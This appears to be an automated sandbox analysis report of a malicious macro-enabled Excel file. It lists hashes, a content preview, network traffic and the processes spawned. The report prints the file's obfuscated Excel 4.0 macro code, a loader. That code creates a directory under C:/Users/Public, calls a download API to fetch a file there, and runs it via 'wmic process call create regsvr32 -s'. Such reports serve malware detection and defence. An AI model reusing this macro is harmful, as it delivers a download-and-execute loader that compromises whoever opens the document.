Size (bytes): | 160 |
Entropy (8bit): | 5.095703110114614 |
Encrypted: | false |
SSDEEP: | 3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnRdde6JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egXeAiv/ |
MD5: | D54D3102F05E6BD2D7AF447501A743FF |
SHA1: | 51BE8488225FE61E01A9AB4112CDB1231C80593B |
SHA-256: | CE9FED99E091E42C390FFBFF36D90A4DEC53BC3DDBAC6494ECCE9894618191B9 |
SHA-512: | 3770AB86E5F7C4784360F59F157AF850F1C84C86DF9EB129FA9E2F61145128404858A16D1F977DD6EB925246367E69232A87DBC87F386D81CC48E2AB77319B34 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.557820060670911 |
TrID: |
|
File name: | Documents (252).xlsm |
File size: | 210308 |
MD5: | 966c13f10fa0b3bfe75da87bca817396 |
SHA1: | 1769db2ec1d019b526e63637a413ceab10d00ff3 |
SHA256: | 963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14 |
SHA512: | e81cd50ab4b16286c51d62baba42170d4403947748d7d3ff4983588f9647b8912aa712fad263e9fd0119be04694d0d4ed8ad68f6d0b9d7b7ce06277e752e46e7 |
SSDEEP: | 1536:0jo+iv69kyln4llllllPtEEEEEEGl464S4A4jJ1rwsYijyKU2p9hYgryA:sLiC97l8Xf1LrDy2iE |
File Content Preview: | PK........E.yR................docProps/PK..........!..X..............docProps/app.xml.SAn.1..#q....'%.P.q.Z..@DJ..k.I,<.e.........,...0..?...$..W......l..ee..B...d8.I.V:... w....$.IX%..P..Dr._.`..<..!f(acA.).1.Q...q.c....J$,........|..&z........u...d.8... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Documents (252).xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AC19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AC20,AD20,""JCJ"",AE19,0)",,"=FORMULA.ARRAY(before.1.0.0.sheet!AK20&before.1.0.0.sheet!AK21&before.1.0.0.sheet!AK22&before.1.0.0.sheet!AK23&before.1.0.0.sheet!AK24&before.1.0.0.sheet!AK25&before.1.0.0.sheet!AK26&before.1.0.0.sheet!AK27,AC20)","=FORMULA.ARRAY(before.1.0.0.sheet!AL20&before.1.0.0.sheet!AL21&before.1.0.0.sheet!AL22&before.1.0.0.sheet!AL23&before.1.0.0.sheet!AL24&before.1.0.0.sheet!AL25&before.1.0.0.sheet!AL26&before.1.0.0.sheet!AL27&before.1.0.0.sheet!AL28&before.1.0.0.sheet!AL29&before.1.0.0.sheet!AL30&before.1.0.0.sheet!AL31&before.1.0.0.sheet!AL32&before.1.0.0.sheet!AL33&before.1.0.0.sheet!AL34&before.1.0.0.sheet!AL35,AD20)",C:/Users/Public,/dbhfr.xref,"=FORMULA.ARRAY(""A"",before.1.0.0.sheet!AE20)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&before.1.0.0.sheet!AN21,before.1.0.0.sheet!AO20&before.1.0.0.sheet!AO21&before.1.0.0.sheet!AO22&before.1.0.0.sheet!AO23&before.1.0.0.sheet!AO24&before.1.0.0.sheet!AO25&before.1.0.0.sheet!AO26&before.1.0.0.sheet!AO27&before.1.0.0.sheet!AO28&before.1.0.0.sheet!AO29&before.1.0.0.sheet!AO30&before.1.0.0.sheet!AO31&before.1.0.0.sheet!AO32&before.1.0.0.sheet!AO33&before.1.0.0.sheet!AO34&before.1.0.0.sheet!AO35&before.1.0.0.sheet!AO36&before.1.0.0.sheet!AE20,AI27,0,A99,before.1.0.0.sheet!AE19&before.1.0.0.sheet!AF19,0,0)",,Kernel32,CreateDirectoryA,A,,,,,,K,C,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF28(),,=AD19(),=AG19(),,,=AA17(),,,,e,r,,LMon,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,e,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,a,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,t,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,D,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJCCBB,,2,i,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""wmic.exe ""&"" process call create 'regsvr32 -s ""&AE19&AF19&""'"")",,,,,,r,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,e,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,,,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,y,,,i,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 02:14:54.822761059 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:14:54.836316109 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:14:55.788259029 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:14:55.801014900 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:05.334461927 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:05.351008892 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:06.919131994 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:06.970834017 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:07.268354893 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:07.300432920 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:07.867729902 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:07.883011103 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:08.279006958 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:08.294044018 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:09.287517071 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:09.318588018 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:09.878669024 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:09.900266886 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:10.039572001 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:10.054943085 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:11.056658030 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:11.072546005 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:11.305095911 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:11.318502903 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:11.822489977 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:11.836613894 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:12.538116932 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:12.550699949 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:13.315592051 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:13.328358889 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:14.567866087 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:14.580437899 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:15.303731918 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:15.318265915 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:16.320115089 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:16.332264900 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:18.314070940 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:18.326477051 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:19.351952076 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:19.365503073 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:20.328499079 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:20.341801882 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:22.822797060 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:22.838080883 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:23.693190098 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:23.705244064 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:24.502034903 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:24.516278028 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:24.548897028 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:24.561378002 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:27.916296959 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:27.936306000 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:32.802227974 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:32.827828884 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:15:59.458954096 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:15:59.471766949 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:02.065057993 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:02.085725069 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:33.418023109 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:33.434314966 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:40.256187916 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:40.284255981 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:16:40.944395065 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:16:40.962261915 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:17:15.378403902 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:17:15.390913963 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Apr 7, 2021 02:17:15.587543964 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 7, 2021 02:17:15.613966942 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 02:15:09.878669024 CEST | 192.168.2.3 | 8.8.8.8 | 0x9b18 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 02:15:09.900266886 CEST | 8.8.8.8 | 192.168.2.3 | 0x9b18 | Name error (3) | none | none | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 02:15:05 |
Start date: | 07/04/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 02:15:09 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\wbem\WMIC.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x300000 |
File size: | 391680 bytes |
MD5 hash: | 79A01FCD1C8166C5642F37D1E0FB7BA8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 02:15:10 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2800000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 02:15:10 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79bfa0000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|